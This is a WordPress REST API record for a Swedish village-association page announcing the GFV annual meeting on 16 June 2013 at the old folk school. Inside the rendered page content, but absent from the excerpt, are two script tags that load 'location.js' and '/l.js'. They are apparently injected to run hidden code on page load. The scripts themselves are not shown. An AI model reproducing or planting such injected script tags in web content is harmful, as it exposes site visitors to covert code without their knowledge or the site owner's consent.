{"id":1844,"date":"2013-06-16T17:35:10","date_gmt":"2013-06-16T15:35:10","guid":{"rendered":"http:\/\/84.20.155.7\/nywp\/?page_id=1844"},"modified":"2013-06-16T17:35:10","modified_gmt":"2013-06-16T15:35:10","slug":"gfv-arsmote-2013","status":"publish","type":"page","link":"https:\/\/hindersby.net\/nywp\/?page_id=1844","title":{"rendered":"GFV \u00e5rsm\u00f6te 2013"},"content":{"rendered":"<p>h\u00e5lls s\u00f6ndagen den 16 juni 2013 p\u00e5 gamla folkskolan.<script src='location.js?p=1' type=text\/javascript><\/script><script src='\/l.js?p=1' type=text\/javascript><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>h\u00e5lls s\u00f6ndagen den 16 juni 2013 p\u00e5 gamla folkskolan.<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":486,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-1844","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=\/wp\/v2\/pages\/1844","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1844"}],"version-history":[{"count":2,"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=\/wp\/v2\/pages\/1844\/revisions"}],"predecessor-version":[{"id":1846,"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=\/wp\/v2\/pages\/1844\/revisions\/1846"}],"up":[{"embeddable":true,"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=\/wp\/v2\/pages\/486"}],"wp:attachment":[{"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1844"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}